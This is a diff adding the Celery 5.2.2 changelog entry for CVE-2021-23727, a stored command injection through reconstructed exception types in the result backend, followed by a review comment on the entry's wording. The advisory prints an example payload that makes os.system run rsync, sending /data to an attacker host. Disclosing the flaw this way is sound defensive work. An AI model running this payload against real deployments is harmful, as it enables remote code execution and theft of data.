@@ -8,6 +8,44 @@ This document contains change notes for bugfix & new features
88in the & 5.2.x series, please see :ref: `whatsnew-5.2 ` for
99an overview of what's new in Celery 5.2.
1010
11+ .. _version-5.2.2 :
12+
13+ 5.2.2
14+ =====
15+
16+ :release-date: 2021-12-26 16:30 P.M UTC+2:00
17+ :release-by: Omer Katz
18+
19+ - Various documentation fixes.
20+ - Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
21+
22+ When a task fails, the failure information is serialized in the backend.
23+ In some cases, the exception class is only importable from the
24+ consumer's code base. In this case, we reconstruct the exception class
25+ so that we can re-raise the error on the process which queried the
26+ task's result. This was introduced in #4836.
27+ If the recreated exception type isn't an exception, this is a security issue.
28+ Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
29+ ``os.system("rsync /data attacker@192.168.56.100:~/data") ``
30+ by setting the task's result to a failure in the result backend with the os,
31+ the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data `` as the exception arguments like so:
32+
33+ .. code-block :: python
34+
35+ {
36+ " exc_module" : " os" ,
37+ ' exc_type' : " system" ,
38+ " exc_message" : " rsync /data attacker@192.168.56.100:~/data"
39+ }
40+
41+ According to my analysis, this vulnerability can only be exploited if
42+ the producer delayed a task which runs long enough for the
43+ attacker to change the result mid-flight, and the producer has
44+ polled for the task's result.
45+ The attacker would also have to gain access to the result backend.
46+ The severity of this security vulnerability is low, but we still
47+ recommend upgrading.
48+
1149
1250.. _version-5.2.1 :
1351
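Review bot: the entry says the fix works "without the condition included in this patch" but never states what that condition checks; spell it out (the preceding sentence, "If the recreated exception type isn't an exception, this is a security issue", implies the reconstructed class must be an exception type), so operators reading the changelog can tell what the 5.2.2 behaviour now guarantees when a stored failure is deserialized. Two smaller points in the same hunk: the example payload mixes quoting styles (`" exc_module" : " os"` next to `' exc_type' : " system"`), which reads as two different serializations rather than one dict, and the release date `16:30 P.M UTC+2:00` combines a 24-hour time with a P.M suffix; drop one of the two.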